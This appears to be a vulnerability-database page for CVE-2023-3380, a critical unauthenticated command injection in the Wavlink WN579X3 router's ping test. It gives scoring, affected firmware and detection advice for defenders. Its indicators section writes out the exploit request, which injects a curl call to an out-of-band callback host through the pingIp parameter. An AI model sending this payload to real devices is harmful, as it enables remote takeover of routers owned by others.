cbcvebase.
CVE-2023-3380
published 2023-06-23

CVE-2023-3380: A vulnerability classified as critical has been found in Wavlink WN579X3 up to 20230615. Affected is an unknown function of the file /cgi-bin/adm.cgi of the…

PriorityP271critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.88%
88.9th percentile
A vulnerability classified as critical has been found in Wavlink WN579X3 up to 20230615. Affected is an unknown function of the file /cgi-bin/adm.cgi of the component Ping Test. The manipulation of the argument pingIp leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232236. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Affected

2 ranges
VendorProductVersion rangeFixed in
wavlinkwn579x3
wavlinkwn579x3_firmware<= 2023-06-15

Detection & IOCsextracted from sources · hover to see the quote

path/cgi-bin/adm.cgi
commandPOST /cgi-bin/adm.cgi HTTP/1.1
commandpage=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}
path/ping.shtml
  • Fingerprint target by checking for WAVLINK-specific strings in the HTTP response body before attempting exploitation.
  • Detect exploitation attempts by monitoring POST requests to /cgi-bin/adm.cgi with the parameter 'pingIp' containing shell metacharacters (e.g., semicolons, encoded as %3B) indicative of command injection.
  • Alert on POST requests to /cgi-bin/adm.cgi with Content-Type: application/x-www-form-urlencoded and body containing 'page=ping_test' combined with shell injection characters in the pingIp parameter.
  • Use Shodan to identify exposed WAVLINK WN579X3 devices for proactive asset discovery and patching prioritization.
  • The vulnerability is unauthenticated (PR:N), so any external IP can trigger it — monitor for unexpected outbound connections (e.g., curl/wget) originating from the router process after a POST to adm.cgi.
  • ·The exploit payload uses an out-of-band interaction (interactsh) to confirm RCE; detection based solely on HTTP response status 200 is insufficient — OOB callback monitoring is required for reliable confirmation.
  • ·The vulnerability affects Wavlink WN579X3 firmware up to version 20230615; devices on this or earlier firmware versions are confirmed vulnerable.
  • ·The Nuclei template uses a two-step flow: first confirming the target is a WAVLINK device, then sending the exploit — single-step detections without the fingerprint check may produce false positives.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.8MEDIUMAV:N/AC:L/Au:M/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.